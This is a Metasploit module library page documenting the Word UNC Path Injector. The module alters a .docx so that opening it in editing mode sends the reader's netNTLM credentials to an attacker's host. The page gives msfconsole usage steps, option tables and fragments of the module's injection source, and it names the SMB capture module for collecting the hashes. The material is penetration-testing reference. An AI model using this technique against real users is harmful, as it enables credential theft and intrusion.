Microsoft Word UNC Path Injector - Metasploit
This page contains detailed information about how to use the auxiliary/docx/word_unc_injector metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Microsoft Word UNC Path Injector
Module: auxiliary/docx/word_unc_injector
Source code: modules/auxiliary/docx/word_unc_injector.rb
Disclosure date: -
Last modification time: 2022-03-10 18:03:35 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/docx/word_unc_injector
msf auxiliary(word_unc_injector) > show targets
... a list of targets ...
msf auxiliary(word_unc_injector) > set TARGET target-id
msf auxiliary(word_unc_injector) > show options
... show and set options ...
msf auxiliary(word_unc_injector) > exploit
Required Options
- LHOST: Server IP or hostname that the .docx document points to.
Go back to menu.
Msfconsole Usage
Here is how the docx/word_unc_injector auxiliary module looks in the msfconsole:
msf6 > use auxiliary/docx/word_unc_injector
msf6 auxiliary(docx/word_unc_injector) > show info
Name: Microsoft Word UNC Path Injector
Module: auxiliary/docx/word_unc_injector
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
SphaZ <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DOCAUTHOR no Document author for empty document.
FILENAME msf.docx yes Document output filename.
LHOST yes Server IP or hostname that the .docx document points to.
SOURCE no Full path and filename of .docx file to use as source. If empty, creates new document.
Description:
This module modifies a .docx file that will, upon opening, submit
stored netNTLM credentials to a remote host. It can also create an
empty docx file. If emailed the receiver needs to put the document
in editing mode before the remote server will be contacted. Preview
and read-only mode do not work. Verified to work with Microsoft Word
2003, 2007, 2010, and 2013. In order to get the hashes the
auxiliary/server/capture/smb module can be used.
References:
https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534
Module Options
This is a complete list of options available in the docx/word_unc_injector auxiliary module:
msf6 auxiliary(docx/word_unc_injector) > show options
Module options (auxiliary/docx/word_unc_injector):
Name Current Setting Required Description
---- --------------- -------- -----------
DOCAUTHOR no Document author for empty document.
FILENAME msf.docx yes Document output filename.
LHOST yes Server IP or hostname that the .docx document points to.
SOURCE no Full path and filename of .docx file to use as source. If empty, creates new document.
Advanced Options
Here is a complete list of advanced options supported by the docx/word_unc_injector auxiliary module:
msf6 auxiliary(docx/word_unc_injector) > show advanced
Module advanced options (auxiliary/docx/word_unc_injector):
Name Current Setting Required Description
---- --------------- -------- -----------
DisablePayloadHandler true no Disable the handler code for the selected payload
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the docx/word_unc_injector module can do:
msf6 auxiliary(docx/word_unc_injector) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the docx/word_unc_injector auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(docx/word_unc_injector) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Not enough rights to read the file. Aborting.
Here is a relevant code snippet related to the "Not enough rights to read the file. Aborting." error message:
91: # here we inject an UNC path into an existing file, and store the injected file in FILENAME
92: def manipulate_file
93: ref = "<w:attachedTemplate r:id=\"rId1\"/>"
94:
95: if not File.stat(datastore['SOURCE']).readable?
96: print_error("Not enough rights to read the file. Aborting.")
97: return nil
98: end
99:
100: # lets extract our docx and store it in memory
101: zip_data = unzip_docx
Bad "word/settings.xml" file, check if it is a valid .docx.
Here is a relevant code snippet related to the "Bad "word/settings.xml" file, check if it is a valid .docx." error message:
101: zip_data = unzip_docx
102:
103: # file to check for reference file we need
104: file_content = zip_data["word/settings.xml"]
105: if file_content.nil?
106: print_error("Bad \"word/settings.xml\" file, check if it is a valid .docx.")
107: return nil
108: end
109:
110: # if we can find the reference to our inject file, we don't need to add it and can just inject our unc path.
111: if not file_content.index("w:attachedTemplate r:id=\"rId1\"").nil?
Cannot find insert point for reference into settings.xml
Here is a relevant code snippet related to the "Cannot find insert point for reference into settings.xml" error message:
127: vprint_status("DefaultTabStop found, we use this for insertion.")
128: file_content.insert(insert_one, ref )
129: end
130:
131: if insert_one.nil? && insert_two.nil?
132: print_error("Cannot find insert point for reference into settings.xml")
133: return nil
134: end
135:
136: # update the files that contain the injection and reference
137: zip_data["word/settings.xml"] = file_content
Error extracting <SOURCE> please verify it is a valid .docx document.
Here is a relevant code snippet related to the "Error extracting <SOURCE> please verify it is a valid .docx document." error message:
162: filezip.each do |entry|
163: zip_data[entry.name] = filezip.read(entry)
164: end
165: end
166: rescue Zip::Error => e
167: print_error("Error extracting #{datastore['SOURCE']} please verify it is a valid .docx document.")
168: return nil
169: end
170: return zip_data
171: end
172:
Failed to create a document from <SOURCE>.
Here is a relevant code snippet related to the "Failed to create a document from <SOURCE>." error message:
185: make_new_file
186: else
187: # extract the word/settings.xml and edit in the reference we need
188: print_status("Injecting UNC path into existing document.")
189: if manipulate_file.nil?
190: print_error("Failed to create a document from #{datastore['SOURCE']}.")
191: else
192: print_good("Copy of #{datastore['SOURCE']} called #{datastore['FILENAME']} points to #{datastore['LHOST']}.")
193: end
194: end
195: end
Go back to menu.
Related Pull Requests
- #12982 Merged Pull Request: Fix broken links to http://jedicorp.com/?p=534 with archive.org
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8336 Merged Pull Request: Specify lhost by interface name
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5059 Merged Pull Request: Yard doc corrections
- #2685 Merged Pull Request: Update description about suitable targets
- #2525 Merged Pull Request: Change module boilerplate
- #2426 Merged Pull Request: Find and replace Msf::Config.install_root, "data"
- #1425 Merged Pull Request: added word_unc_injector auxiliary module
References
See Also
Check also the following modules related to this module:
- post/windows/gather/word_unc_injector
- exploit/windows/fileformat/word_msdtjs_rce
- exploit/windows/fileformat/word_mshtml_rce
- auxiliary/admin/2wire/xslt_password_reset
- auxiliary/admin/http/dlink_dir_645_password_extractor
- auxiliary/admin/http/dlink_dsl320b_password_extractor
- auxiliary/admin/http/mantisbt_password_reset
- auxiliary/admin/http/netgear_soap_password_extractor
- auxiliary/admin/http/zyxel_admin_password_extractor
- auxiliary/admin/scada/modicon_password_recovery
- auxiliary/admin/vxworks/apple_airport_extreme_password
- auxiliary/dos/http/wordpress_directory_traversal_dos
- auxiliary/dos/http/wordpress_long_password_dos
- auxiliary/dos/http/wordpress_xmlrpc_dos
- auxiliary/gather/c2s_dvr_password_disclosure
- auxiliary/gather/ipcamera_password_disclosure
- auxiliary/gather/netgear_password_disclosure
- auxiliary/scanner/http/http_sickrage_password_leak
- auxiliary/scanner/http/wordpress_content_injection
- auxiliary/scanner/http/wordpress_cp_calendar_sqli
- auxiliary/scanner/http/wordpress_ghost_scanner
- auxiliary/scanner/http/wordpress_login_enum
- auxiliary/scanner/http/wordpress_multicall_creds
- auxiliary/scanner/http/wordpress_pingback_access
- auxiliary/scanner/http/wordpress_scanner
- auxiliary/scanner/http/wordpress_xmlrpc_login
- auxiliary/scanner/misc/raysharp_dvr_passwords
- auxiliary/scanner/misc/rosewill_rxs3211_passwords
- auxiliary/scanner/telnet/lantronix_telnet_password
- post/windows/manage/peinjector
- auxiliary/admin/aws/aws_launch_instances
- auxiliary/scanner/http/lucky_punch
- auxiliary/scanner/portscan/ftpbounce
- auxiliary/server/android_browsable_msf_launch
- auxiliary/server/socks_unc
Authors
- SphaZ <cyberphaz[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.2.4-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.